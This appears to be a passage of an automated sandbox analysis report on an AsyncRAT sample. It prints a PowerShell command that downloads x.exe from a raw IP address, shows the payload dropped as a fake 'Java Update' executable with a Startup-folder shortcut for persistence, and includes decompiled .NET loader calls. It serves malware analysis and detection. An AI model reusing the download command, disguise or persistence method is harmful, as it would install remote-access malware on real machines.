                              Source: x.exe.3.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: x.exe.3.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: Java Update (32bit).exe.5.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: Java Update (32bit).exe.5.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: Java Update (32bit).exe.5.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              .NET source code contains potential unpacker
                              Source: x.exe.3.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                              Source: x.exe.3.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                              Source: x.exe.3.dr, Messages.cs.Net Code: Memory
                              Source: Java Update (32bit).exe.5.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                              Source: Java Update (32bit).exe.5.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                              Source: Java Update (32bit).exe.5.dr, Messages.cs.Net Code: Memory
                              Suspicious powershell command line found
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040ADD6
                              Source: da6ke5KbfB.exeStatic PE information: section name: .code
                              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00007FF848E600BD pushad ; iretd 5_2_00007FF848E600C1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D6D2A5 pushad ; iretd 6_2_00007FF848D6D2A6
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848F50835 pushfd ; retf 6_2_00007FF848F50837
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848F52316 push 8B485F92h; iretd 6_2_00007FF848F5231B
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848F52185 pushfd ; retf 6_2_00007FF848F52187
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848D5D2A5 pushad ; iretd 9_2_00007FF848D5D2A6
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848E700BD pushad ; iretd 9_2_00007FF848E700C1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848F40835 pushfd ; retf 9_2_00007FF848F40837
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848F42316 push 8B485F93h; iretd 9_2_00007FF848F4231B
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848F42185 pushfd ; retf 9_2_00007FF848F42187
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848D4D2A5 pushad ; iretd 12_2_00007FF848D4D2A6
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848E61B15 push eax; iretd 12_2_00007FF848E61B5D
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848E610E8 push E870310Dh; ret 12_2_00007FF848E610F9
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848E600BD pushad ; iretd 12_2_00007FF848E600C1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F30835 pushfd ; retf 12_2_00007FF848F30837
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F32316 push 8B485F94h; iretd 12_2_00007FF848F3231B
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F32185 pushfd ; retf 12_2_00007FF848F32187
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F333D5 pushfd ; retf 12_2_00007FF848F333D7
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848D5D2A5 pushad ; iretd 14_2_00007FF848D5D2A6
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848E7121D push E95BF205h; ret 14_2_00007FF848E71239
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848E700BD pushad ; iretd 14_2_00007FF848E700C1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848F40835 pushfd ; retf 14_2_00007FF848F40837
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848F42316 push 8B485F93h; iretd 14_2_00007FF848F4231B
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848F42185 pushfd ; retf 14_2_00007FF848F42187
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\ProgramData\Java Update (32bit).exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\ProgramData\Java Update (32bit).exeJump to dropped file

                              Boot Survival

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: 5.0.x.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 616, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnkJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnkJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Loading BitLocker PowerShell Module
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
